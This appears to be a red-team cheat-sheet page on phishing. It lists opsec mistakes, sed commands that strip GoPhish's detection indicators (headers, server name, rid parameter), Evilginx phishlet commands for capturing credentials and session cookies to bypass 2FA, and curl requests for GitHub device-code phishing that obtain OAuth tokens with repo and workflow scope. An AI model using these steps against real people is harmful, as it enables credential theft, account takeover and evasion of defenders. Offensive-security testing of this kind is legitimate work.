Skip to content

Phishing

Phishing is a cybersecurity attack where malicious actors impersonate legitimate organizations (like banks, social media platforms, or email providers) to trick people into revealing sensitive information such as passwords, credit card numbers, or personal data.

Opsec Fails

  • Reusing IPs/Domains: Using the same IP address or domain across multiple campaigns or malware families.
  • No Domain Privacy: WHOIS records exposing registrant info (name, email, phone).
  • Same Registrant Email: Reusing the same email address across domains.
  • Unrotated SSL Certificates: Self-signed or identical certificates reused across phishing sites.

GoPhish

git clone https://github.com/gophish/gophish.git
go build

IOC

  • X-Gophish-Contact and X-Gophish-Signature

    find . -type f -exec sed -i.bak 's/X-Gophish-Contact/X-Contact/g' {} +
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
    sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go
    
    find . -type f -exec sed -i.bak 's/X-Gophish-Signature/X-Signature/g' {} +
    sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go
    
  • Default server name

    sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go
    
  • Default rid parameter

    sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "keyname"/g' models/campaign.go
    

Evilginx

  • kgretzky/evilginx2 - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
  • evilginxpro - The phishing framework for red teams
# List Available Phishlets
phishlets

# Enable a Phishlet
phishlets enable <phishlet_name>

# Disable a Phishlet
phishlets disable <phishlet_name>

Device Code Phishing

  • Github

    curl -X POST https://github.com/login/device/code \
    -H "Accept: application/json" \
    -d "client_id=01ab8ac9400c4e429b23&scope=user+repo+workflow"
    
    curl -X POST https://github.com/login/oauth/access_token \
    -H "Accept: application/json" \
    -d "client_id=01ab8ac9400c4e429b23&device_code=be9<code_from_earlier>&&grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Adevice_code" -k | jq
    

References